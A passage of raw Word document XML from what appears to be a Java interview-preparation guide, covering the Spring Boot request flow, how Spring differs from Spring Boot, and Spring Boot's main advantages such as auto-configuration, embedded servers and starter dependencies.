          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Beans (services, repositories, controllers) are instantiated and injected via Spring’s IoC container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A309039"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HTTP Request Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The DispatcherServlet handles incoming HTTP requests, forwards them to the appropriate controller method, and sends back the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1419B7B2"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ata Access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spring Data JPA repositories interact with the database to perform CRUD operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A8EB1A"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Transaction Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spring ensures transactional consistency with the @Transactional annotation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20500A35"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ecurity and Error Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Security is managed by Spring Security, and exceptions are handled using @ControllerAdvice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A44ADA" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE7F8E" w:rsidP="00EC55E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Boot abstracts much of the configuration, allowing developers to focus more on writing business logic instead of dealing with low-level configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430FC679" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FE7F8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5C4694B">
          <v:rect id="_x0000_i2471" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F1A754" w14:textId="77777777" w:rsidR="001F0776" w:rsidRPr="00CE4B95" w:rsidRDefault="001F0776" w:rsidP="001F0776">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="487CA658" w14:textId="77777777" w:rsidR="00844E79" w:rsidRPr="00CE4B95" w:rsidRDefault="00844E79">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="567" w:name="_Toc196308047"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Spring and Spring Boot?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="567"/>
    </w:p>
    <w:p w14:paraId="28DD2FB9" w14:textId="5E324939" w:rsidR="00844E79" w:rsidRPr="00CE4B95" w:rsidRDefault="00844E79">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="345EEBC8" w14:textId="77777777" w:rsidR="00C56293" w:rsidRPr="00CE4B95" w:rsidRDefault="00C56293" w:rsidP="00C5629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pring Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38883039" w14:textId="77777777" w:rsidR="00C56293" w:rsidRPr="00CE4B95" w:rsidRDefault="00C56293">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27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at it is: A comprehensive, modular framework for building Java applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAEC901" w14:textId="77777777" w:rsidR="00C56293" w:rsidRPr="00CE4B95" w:rsidRDefault="00C56293">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27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rpose: Provides the infrastructure support (like dependency injection, AOP, etc.) for building enterprise-level applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B622472" w14:textId="77777777" w:rsidR="00C56293" w:rsidRPr="00CE4B95" w:rsidRDefault="00C56293">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27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tup: Requires a lot of boilerplate code and XML or Java-based configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1D17A2" w14:textId="77777777" w:rsidR="00C56293" w:rsidRPr="00CE4B95" w:rsidRDefault="00C56293">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27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eb Development: You need to set up the web server manually (like Tomcat).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A20831B" w14:textId="77777777" w:rsidR="00C56293" w:rsidRPr="00CE4B95" w:rsidRDefault="00C56293">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27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pendency Management: You manually handle dependencies using Maven/Gradle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C529A2B" w14:textId="77777777" w:rsidR="00C56293" w:rsidRPr="00CE4B95" w:rsidRDefault="00C56293">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27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earning Curve: Steeper due to more setup and configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F14B1A" w14:textId="77777777" w:rsidR="00C56293" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00C5629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A6B4410">
          <v:rect id="_x0000_i2472" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDAD201" w14:textId="77777777" w:rsidR="00C56293" w:rsidRPr="00CE4B95" w:rsidRDefault="00C56293" w:rsidP="00C5629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pring Boot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB7349F" w14:textId="77777777" w:rsidR="00C56293" w:rsidRPr="00CE4B95" w:rsidRDefault="00C56293">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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at it is: An extension of the Spring Framework that simplifies application development.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6AA3CF" w14:textId="77777777" w:rsidR="00C56293" w:rsidRPr="00CE4B95" w:rsidRDefault="00C56293">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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rpose: Helps to quickly bootstrap and develop Spring-based applications with minimal configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1B1330" w14:textId="77777777" w:rsidR="00C56293" w:rsidRPr="00CE4B95" w:rsidRDefault="00C56293">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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tup: Zero or minimal configuration — uses auto-configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BC1438" w14:textId="77777777" w:rsidR="00C56293" w:rsidRPr="00CE4B95" w:rsidRDefault="00C56293">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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eb Development: Embedded servers like Tomcat/Jetty come pre-configured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6084E0" w14:textId="77777777" w:rsidR="00C56293" w:rsidRPr="00CE4B95" w:rsidRDefault="00C56293">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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pendency Management: Comes with Spring Boot Starter dependencies that group common dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D69217" w14:textId="77777777" w:rsidR="00C56293" w:rsidRPr="00CE4B95" w:rsidRDefault="00C56293">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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earning Curve: Easier to get started, ideal for microservices and quick PoCs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AF5AFE" w14:textId="77777777" w:rsidR="00C56293" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00C5629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01EFD64">
          <v:rect id="_x0000_i2473" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C428590" w14:textId="77777777" w:rsidR="00C56293" w:rsidRPr="00CE4B95" w:rsidRDefault="00C56293" w:rsidP="00C56293">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4"/>
        <w:gridCol w:w="2649"/>
        <w:gridCol w:w="3435"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C56293" w:rsidRPr="00CE4B95" w14:paraId="3CF92FBD" w14:textId="77777777" w:rsidTr="00C56293">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F0A9D23" w14:textId="77777777" w:rsidR="00C56293" w:rsidRPr="00CE4B95" w:rsidRDefault="00C56293" w:rsidP="00C56293">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153B1E8F" w14:textId="77777777" w:rsidR="00C56293" w:rsidRPr="00CE4B95" w:rsidRDefault="00C56293" w:rsidP="00C56293">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pring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18101B6F" w14:textId="77777777" w:rsidR="00C56293" w:rsidRPr="00CE4B95" w:rsidRDefault="00C56293" w:rsidP="00C56293">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pring Boot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C56293" w:rsidRPr="00CE4B95" w14:paraId="2564A916" w14:textId="77777777" w:rsidTr="00C56293">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EA94B43" w14:textId="77777777" w:rsidR="00C56293" w:rsidRPr="00CE4B95" w:rsidRDefault="00C56293" w:rsidP="00C5629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figuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FB92EDD" w14:textId="77777777" w:rsidR="00C56293" w:rsidRPr="00CE4B95" w:rsidRDefault="00C56293" w:rsidP="00C5629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nual, XML/Java-based</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E47D934" w14:textId="77777777" w:rsidR="00C56293" w:rsidRPr="00CE4B95" w:rsidRDefault="00C56293" w:rsidP="00C5629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uto-configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C56293" w:rsidRPr="00CE4B95" w14:paraId="1195EEC7" w14:textId="77777777" w:rsidTr="00C56293">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21B77AF3" w14:textId="77777777" w:rsidR="00C56293" w:rsidRPr="00CE4B95" w:rsidRDefault="00C56293" w:rsidP="00C5629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rver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16F47A78" w14:textId="77777777" w:rsidR="00C56293" w:rsidRPr="00CE4B95" w:rsidRDefault="00C56293" w:rsidP="00C5629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ternal (Tomcat, Jetty)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C0B1E4B" w14:textId="77777777" w:rsidR="00C56293" w:rsidRPr="00CE4B95" w:rsidRDefault="00C56293" w:rsidP="00C5629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mbedded (Tomcat, Jetty, Undertow)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C56293" w:rsidRPr="00CE4B95" w14:paraId="205B182F" w14:textId="77777777" w:rsidTr="00C56293">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FF5FF5E" w14:textId="77777777" w:rsidR="00C56293" w:rsidRPr="00CE4B95" w:rsidRDefault="00C56293" w:rsidP="00C5629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Setup Complexity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B528007" w14:textId="77777777" w:rsidR="00C56293" w:rsidRPr="00CE4B95" w:rsidRDefault="00C56293" w:rsidP="00C5629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re complex</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0706864E" w14:textId="77777777" w:rsidR="00C56293" w:rsidRPr="00CE4B95" w:rsidRDefault="00C56293" w:rsidP="00C5629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mple and fast</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C56293" w:rsidRPr="00CE4B95" w14:paraId="04400BF4" w14:textId="77777777" w:rsidTr="00C56293">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61BB7F3D" w14:textId="77777777" w:rsidR="00C56293" w:rsidRPr="00CE4B95" w:rsidRDefault="00C56293" w:rsidP="00C5629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oject Structure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="710D41E4" w14:textId="77777777" w:rsidR="00C56293" w:rsidRPr="00CE4B95" w:rsidRDefault="00C56293" w:rsidP="00C5629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nual</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24A5B5E6" w14:textId="77777777" w:rsidR="00C56293" w:rsidRPr="00CE4B95" w:rsidRDefault="00C56293" w:rsidP="00C5629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vention over configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C56293" w:rsidRPr="00CE4B95" w14:paraId="1D219C6C" w14:textId="77777777" w:rsidTr="00C56293">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2817497D" w14:textId="77777777" w:rsidR="00C56293" w:rsidRPr="00CE4B95" w:rsidRDefault="00C56293" w:rsidP="00C5629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icroservices Support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="206AFC94" w14:textId="77777777" w:rsidR="00C56293" w:rsidRPr="00CE4B95" w:rsidRDefault="00C56293" w:rsidP="00C5629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quires setup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43688E23" w14:textId="77777777" w:rsidR="00C56293" w:rsidRPr="00CE4B95" w:rsidRDefault="00C56293" w:rsidP="00C5629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uilt-in support</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C56293" w:rsidRPr="00CE4B95" w14:paraId="1AC35B55" w14:textId="77777777" w:rsidTr="00C56293">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D7AAE8E" w14:textId="77777777" w:rsidR="00C56293" w:rsidRPr="00CE4B95" w:rsidRDefault="00C56293" w:rsidP="00C5629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Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="568756D3" w14:textId="77777777" w:rsidR="00C56293" w:rsidRPr="00CE4B95" w:rsidRDefault="00C56293" w:rsidP="00C5629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arge enterprise applications</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="211AC34E" w14:textId="77777777" w:rsidR="00C56293" w:rsidRPr="00CE4B95" w:rsidRDefault="00C56293" w:rsidP="00C5629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icroservices, REST APIs, POCs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5393971B" w14:textId="77777777" w:rsidR="00C56293" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00C5629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EBCE88">
          <v:rect id="_x0000_i2474" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3510647C" w14:textId="212C14AE" w:rsidR="00844E79" w:rsidRPr="00CE4B95" w:rsidRDefault="00844E79">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="568" w:name="_Toc196308048"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the advantages of Spri</w:t>
      </w:r>
      <w:r w:rsidR="00631DB8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="00190868" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Boot?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="568"/>
    </w:p>
    <w:p w14:paraId="50EBAF07" w14:textId="1BBBA9D7" w:rsidR="00844E79" w:rsidRPr="00CE4B95" w:rsidRDefault="00844E79">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A3D47D9" w14:textId="77777777" w:rsidR="005F4553" w:rsidRPr="00CE4B95" w:rsidRDefault="005F4553" w:rsidP="005F455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1. Auto Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFA43E5" w14:textId="77777777" w:rsidR="005F4553" w:rsidRPr="00CE4B95" w:rsidRDefault="005F4553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27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utomatically configures your application based on the dependencies present in the classpath.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0B8FE4" w14:textId="77777777" w:rsidR="005F4553" w:rsidRPr="00CE4B95" w:rsidRDefault="005F4553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27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duces the need for complex XML or Java config files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159C06A8" w14:textId="77777777" w:rsidR="005F4553" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="005F45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615E1C5">
          <v:rect id="_x0000_i2475" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB812EE" w14:textId="77777777" w:rsidR="005F4553" w:rsidRPr="00CE4B95" w:rsidRDefault="005F4553" w:rsidP="005F455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2. Embedded Servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BAFB45" w14:textId="77777777" w:rsidR="005F4553" w:rsidRPr="00CE4B95" w:rsidRDefault="005F4553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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es with embedded Tomcat, Jetty, or Undertow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5546527E" w14:textId="77777777" w:rsidR="005F4553" w:rsidRPr="00CE4B95" w:rsidRDefault="005F4553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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need to deploy WAR files — just run the app as a Java application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D7901B" w14:textId="77777777" w:rsidR="005F4553" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="005F45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08308ED">
          <v:rect id="_x0000_i2476" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C0179A" w14:textId="77777777" w:rsidR="005F4553" w:rsidRPr="00CE4B95" w:rsidRDefault="005F4553" w:rsidP="005F455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3. Starter Dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195646D7" w14:textId="77777777" w:rsidR="005F4553" w:rsidRPr="00CE4B95" w:rsidRDefault="005F4553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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ovides starter POMs (like spring-boot-starter-web, spring-boot-starter-data-jpa) to simplify dependency management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE85C0E" w14:textId="77777777" w:rsidR="005F4553" w:rsidRPr="00CE4B95" w:rsidRDefault="005F4553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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e-line inclusion instead of multiple individual dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76205688" w14:textId="77777777" w:rsidR="005F4553" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="005F45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FA3515">
          <v:rect id="_x0000_i2477" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A48A41" w14:textId="77777777" w:rsidR="005F4553" w:rsidRPr="00CE4B95" w:rsidRDefault="005F4553" w:rsidP="005F455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4. Production-Ready Features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3058BA5A" w14:textId="77777777" w:rsidR="005F4553" w:rsidRPr="00CE4B95" w:rsidRDefault="005F4553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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uilt-in support for monitoring and management via Spring Boot Actuator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F1E742" w14:textId="77777777" w:rsidR="005F4553" w:rsidRPr="00CE4B95" w:rsidRDefault="005F4553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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poses endpoints to check health, metrics, environment, and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1941C3A5" w14:textId="77777777" w:rsidR="005F4553" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="005F45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D316F5">
          <v:rect id="_x0000_i2478" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFB3D4D" w14:textId="77777777" w:rsidR="005F4553" w:rsidRPr="00CE4B95" w:rsidRDefault="005F4553" w:rsidP="005F455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5. Minimal Boilerplate Code</w:t>
      </w:r>
    </w:p>
